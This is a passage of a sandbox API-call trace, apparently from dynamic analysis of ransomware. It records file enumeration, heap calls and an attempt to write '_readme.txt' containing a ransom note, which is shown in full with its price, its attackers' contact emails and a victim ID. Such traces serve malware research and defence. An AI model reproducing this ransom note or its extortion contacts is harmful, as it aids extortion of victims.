hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.804] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.804] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.805] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.805] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.806] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.806] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0183.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.806] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.806] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.806] PathFindFileNameW (pszPath="") returned="" [0183.806] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.806] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0183.807] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0183.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0183.807] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0183.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0183.807] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0183.807] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0183.807] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.807] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.807] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 0 [0183.808] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0183.808] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.809] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.809] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0183.809] CreateFileW (lpFileName="C:\\Boot\\es-ES\\_readme.txt" (normalized: "c:\\boot\\es-es\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.809] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0183.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0183.810] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.810] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.810] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*" (normalized: "c:\\boot\\es-es\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0183.811] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.811] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d844e0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.811] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0183.811] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d844e0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0183.811] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0183.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.812] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0183.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0183.812] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0183.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.812] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.813] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.813] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.814] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.815] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.815] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.816] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.818] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.818] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.819] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.820] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.821] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.822] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.822] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.823] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.823] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.824] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.824] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.825] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.825] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.826] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.826] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.827] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.827] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.828] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.828] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.829] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.829] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.830] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.830] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.831] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.831] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e776e0 [0183.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.832] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.832] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.833] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.833] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.834] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.834] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.835] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.835] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0183.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0183.836] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0183.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.836] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0183.837] HeapFree (in: 